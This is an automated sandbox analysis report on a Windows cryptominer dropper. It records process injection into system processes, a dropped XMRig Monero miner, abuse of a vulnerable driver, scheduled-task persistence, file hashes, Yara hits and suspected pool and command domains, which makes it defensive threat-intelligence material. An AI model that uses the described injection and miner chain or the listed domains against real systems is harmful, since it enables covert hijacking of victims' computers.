Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 File Deletion | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph ID: 884914 | Sample: file.exe | Startdate: 09/06/2023 | Architecture: WINDOWS | Score: 100

• Sample root (2): Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 9 other signatures. Started: file.exe (8), cmd.exe (12), cmd.exe (14), 3 other processes (16).
• file.exe (8): dropped C:\Users\user\AppData\...\dxpserver.exe (PE32+) and C:\Users\user\AppData\...\bjmgommvilsr.tmp (PE32+). Signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Found hidden mapped module (file has been removed from disk); 2 other signatures. Started: dialer.exe (18).
• cmd.exe (12): started conhost.exe (21), sc.exe (23), 4 other processes (33).
• cmd.exe (14): started conhost.exe (25), 4 other processes (35).
• 3 other processes (16): started conhost.exe (27), conhost.exe (29), conhost.exe (31).
• dialer.exe (18): Signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures. Injected into: svchost.exe (37), lsass.exe (39), dwm.exe (42), 22 other processes (44).
• svchost.exe (37, injected): started dxpserver.exe (46).
• lsass.exe (39, injected): Signatures: Writes to foreign memory regions. Started: WMIADAP.exe (50).
• dxpserver.exe (46): dropped C:\Users\user\AppData\Roaming\...\WR64.sys (PE32+). Signatures: Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 4 other signatures.

Source | Detection | Scanner | Label | Link
file.exe | 41% | ReversingLabs | Win64.Trojan.Barys |
file.exe | 35% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp | 44% | ReversingLabs | Win64.Trojan.DisguisedXMRigMiner |
C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp | 64% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys | 5% | ReversingLabs | |
C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys | 2% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | 41% | ReversingLabs | Win64.Trojan.Barys |
                        No Antivirus matches
                        No Antivirus matches
Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
http://www.microsoft.co | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://www.microsoft.cok | 0% | Avira URL Cloud | safe |
http://www.micro.com/pki/certs/MicRooCerAut_2010-06-23.crt0 | 0% | Avira URL Cloud | safe |
                        No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.cok | powershell.exe, 0000000C.00000003.539682718.000002BB4D166000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 0000000C.00000003.516711520.000002BB36805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB369C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB368D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB3690E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.521657211.000002BB3625E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 0000000C.00000002.573322482.000002BB4D076000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000C.00000002.544110092.000002BB34B81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.micro.com/pki/certs/MicRooCerAut_2010-06-23.crt0 | powershell.exe, 0000000C.00000002.573322482.000002BB4D076000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                      No contacted IP infos
                                      Joe Sandbox Version:37.1.0 Beryl
                                      Analysis ID:884914
                                      Start date and time:2023-06-09 13:28:13 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 13m 2s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:26
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:25
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.mine.winEXE@44/68@0/0
                                      EGA Information:
                                      • Successful, ratio: 60%
                                      HDC Information:
                                      • Successful, ratio: 32.3% (good quality ratio 29.4%)
                                      • Quality average: 63.1%
                                      • Quality standard deviation: 32.9%
                                      HCA Information:
                                      • Successful, ratio: 61%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): conhost.exe, WmiPrvSE.exe, schtasks.exe
                                      • Excluded domains from analysis (whitelisted): gulf.moneroocean.stream, conn.gta5cheatcode.world, pastebin.com, ppanel.freaktorrentz.xyz
                                      • Execution Graph export aborted for target file.exe, PID 7028 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 3804 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
13:29:08 | API Interceptor | 1x Sleep call for process: file.exe modified
13:29:19 | API Interceptor | 83x Sleep call for process: powershell.exe modified
13:29:38 | Task Scheduler | Run new task: sethc path: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
13:30:04 | API Interceptor | 1x Sleep call for process: dxpserver.exe modified
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):5536256
                                      Entropy (8bit):6.689058470432344
                                      Encrypted:false
                                      SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                      MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                      SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                      SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                      SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: Florian Roth (Nextron Systems)
                                      • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: Florian Roth (Nextron Systems)
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: Joe Security
                                      • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: ditekSHen
                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: unknown
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 44%
                                      • Antivirus: Virustotal, Detection: 64%
                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                                      Process:C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):14544
                                      Entropy (8bit):6.2660301556221185
                                      Encrypted:false
                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n, Description: Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, Source: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys, Author: Florian Roth
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      • Antivirus: Virustotal, Detection: 2%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):10264640
                                      Entropy (8bit):7.644002604978999
                                      Encrypted:false
                                      SSDEEP:98304:AScdwkEObD07UX4SIf6Ky9UBMJs52fvaUhOAllh3uJZbZSvHzmmkvgDlWBixnxCa:Ald3Z0I2T0gAfCbZSvTlRXqbtci+
                                      MD5:EEE7B971E0B76A0DF56BDAC2AC2FA343
                                      SHA1:C80F9D9DE5D0DFF115BBB7638554DADE321D7C65
                                      SHA-256:ECD60313BA990F1300B37DB4064977E83F109FDF93A728CF434106C1B5B5A2D5
                                      SHA-512:FFFD216C820B3BE324AC72A46C50683B42218DEAF95C219670C3F44C091424E8ED5FC42B28F4AAB46E8024A52CBE4CA989031CA3641536F3FAE0A2B5F4F79E85
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 41%
                                      Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......d...............&.....\...*.............@...................................$....`... .................................................4...........@..0....`..@@......0............................ ..(.......................P............................text... ...........................`..`.data....&.......(..................@....rdata..pB......D.................@..@.pdata..0....@......................@..@.xdata..D....`.......0..............@..@.bss.....(...p...........................idata..4............@..............@....CRT....`............L..............@....tls.................N..............@....rsrc...............P..............@....reloc..0............\..............@..B........................................................................................................................................................................
                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):3444
                                      Entropy (8bit):5.011954215267298
                                      Encrypted:false
                                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                      MD5:B133A676D139032A27DE3D9619E70091
                                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                      Malicious:false
                                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):924
                                      Entropy (8bit):2.8598329685344623
                                      Encrypted:false
                                      SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivG:Q3wU/IM1x6oG
                                      MD5:2667367F9339639AF825E7122CE3B2A3
                                      SHA1:56E33B464F9AD8D0A6AC3343A85D7618D590FEDC
                                      SHA-256:B2353629E198C2F5244BC75AD797789FFBCA2CED084D731084AF312AD6DCBE7F
                                      SHA-512:A214C16977CFD760929F76D33DBA89277C6BC7B5948ACFBD89D6AF4A688B9F421D3D2860E1CAE81436E05A52FFED92B04AA2ABBF70CE7231A053BD3E724F3EA9
                                      Malicious:false
                                      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.........
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.2640752180121995
                                      Encrypted:false
                                      SSDEEP:384:AhO7X/cfpYaTjLjVnrRcF36QoXmH4yH631Sy7omGd4e4BZiLqwV:Aw7X/cfJf4F36QoXmYyHgScomGd4e0i
                                      MD5:3DE60C311BA5F4294721C9FBF4A37053
                                      SHA1:A299F68A8A79845B296142D2E556930913AFE3D5
                                      SHA-256:D00B8F740A149BC47FFEE0E071EA21376257208357AFB8CD57C3E3CC39421A5A
                                      SHA-512:ACA307930C90095207342AC8866416E8517F593640ECD140679761A9111223299E5C8C126FB8DF84F4A02DD02A829E24EA7AB6FBCFF9D947D75B125C915C5A59
                                      Malicious:false
                                      Preview:ElfChnk.........:...............:...........h........x......................................................................;>.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F.......................&................$..........................!#...............M..........................IR......y...........................**..@...........7....,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.347250455983504
                                      Encrypted:false
                                      SSDEEP:768:TDw9YZvRDamznmD7zMUkgzBu5ndlhoT/qBs8jegk8FW:3WYZJDamzUVkgz
                                      MD5:FF0FD6409A56C7FE0AA6D1E4B003B279
                                      SHA1:250FCA49B543051D7ACBE9B3A22D20B3F7336CC7
                                      SHA-256:75DB5782AC99B761C766463592578BB6453181DC04BD93CD5A805BACA158F301
                                      SHA-512:C3CF53C18D7BDF72E8C7CC2D8F0F8ADB40C2AB75DB332F66BB7138C4B41D8B454601B44DD38140A8E14CB08B26F14289B976FBAD18695C392C251F8C493E3435
                                      Malicious:false
                                      Preview:ElfChnk..............................................5.......................................................................%.W................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F........................F..........................................................................................................................**...............K.."-............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.411787532800935
                                      Encrypted:false
                                      SSDEEP:384:OhpVnVlVKViV7V5VCVB1VKV/VAVTV5VhVeVUVGV3MVVXVqmVXVGVaVWVI1kVKVzM:O0KCE9WqcKM0
                                      MD5:4FC975079020351D7E7F5EEA828EC85E
                                      SHA1:5F47AEB875F63054A9D90F18158E1CD297E45A4D
                                      SHA-256:14DD828B2AB6F3B9E521DACF6AFBA47231734B2CD31CCB9C79B90C4697BD0A13
                                      SHA-512:9FEEC7B4FA450EF7B4DA827A93728A4D413B30E9A70500E52C16FC5BDFE6F6C2DD6699CF16357741B984BE20AA39B6C9CDFE1D2B671DCA6FE84DB73F824D239F
                                      Malicious:false
                                      Preview:ElfChnk......................................7...9...../.....................................................................o................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...................'...&...........................................................................................................................**.. .............UD.............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.358272552481095
                                      Encrypted:false
                                      SSDEEP:768:0jOA+MT8lqm6jLtIhMEp8eitIa+wff9Fi:/A+Mglqm6jLtIhMEp8eitIa+wff9Fi
                                      MD5:6C371EF480A05D7DA2A4BFF27D3D7C0C
                                      SHA1:2356A48C55143619D84F7F26B146829DFA3A5287
                                      SHA-256:4CCF963F56389BC0475E9719D4B17815189B4E4DC81C6025A7EB3DE2992902A8
                                      SHA-512:5518C7A29965FDA98592372B23B4B99D23F3FCBC5A961532900C42D4DB851C798E29BF48A9B911D54F7C9C8261AF2D1236C5CE690F3B4FB785EB3F6382B92891
                                      Malicious:false
                                      Preview:ElfChnk.".......m.......".......m...............X....>......................................................................WT.................h...........................=...........................................................................................................................f...............?...........................m...................M...F...................+V..&....0.......=.......P..cz...S......A....................C...Y..3A...K......#.......[................................H......**......".........S."-............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.34944440006736494
                                      Encrypted:false
                                      SSDEEP:96:7PNVaO8oM33Z85ZMLS3Z85ZEb73Z85Zu:hV78p8nMLSp8n67p8n
                                      MD5:8060447F44E276F35409FD79D5942504
                                      SHA1:6110FF4F6EFCE1D49465037721FC4C43F53900CE
                                      SHA-256:070B65D8FFBBA52124D5B713E259CA2A4900B9741B9601E979C8666510E58D79
                                      SHA-512:8F74FEEB8B25965F88D7FCDAD8BFB63F72D34EF388296F10543F43298D6E8A07618F451A682BC96FA69F4CD79A3B9B79E81A08687F6714155AE84096404A5BF9
                                      Malicious:false
                                      Preview:ElfChnk..............................................8.......................................................................'..............................................=...........................................................................................................................f...............?...................................p...........M...F.......................................&...........................................................................................................**...................,..........-.&.........-.{CST....M.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):66432
                                      Entropy (8bit):2.861101034163211
                                      Encrypted:false
                                      SSDEEP:384:+pYhCp+VpblpbmpbQpbUpbPpS0pQZp68jp6LpM3pMlypb8pbrpb/pb2pS3pQ+p6b:75xhDNeIY
                                      MD5:8755196181DBFBA9189EE0F48EC6301C
                                      SHA1:ABE2E878D0C676B032DBFE68FA787BCD7B30A90C
                                      SHA-256:B1A0F3119A6BB7D217D8D10737EEE39D8B1448B53F2DC2A603CFACFA18324838
                                      SHA-512:E6988EEB611873E7E98A813050F46E8C3B012A7948814F01CE6DB525F55F01D79517686B8269658568219DFEEF690CF4CD8173B252A5D33E6ECA3E76610ED611
                                      Malicious:false
                                      Preview:ElfChnk.........[...............[...........@..........l....................................................................&TI.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F.......................&................................+..........................................................................................**......[.......9.` ..............&.......................................................................N...'.!...t.............9.` .....U]..\J..x...|.........[........................I..~.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.u.d.i.o...K.o.E.!....(SM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.u.d.i.o./.P.l.a.y.b.a.c.k.M.a.n.a.g.e.r...@.`........................................ElfChnk.........[...............[...........@..........l................................................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.6173737032728863
                                      Encrypted:false
                                      SSDEEP:384:yhnGwG+T7Gx4GyoGhGNGMGNsGX/GlGYMGbYGqGjGEGZGgGAGZG7GMGBGaGjGBGlT:ymw+ZGLBYKzK01OS
                                      MD5:00151E8AE08696975F05A052F35BD9B3
                                      SHA1:5C22458E5968CA480B77FFE4ABD008FF6EE9775C
                                      SHA-256:CC8DA9420C79DB1B03AD1C25525B753A973BBDDD6C922ABA86518C6CABF12DE1
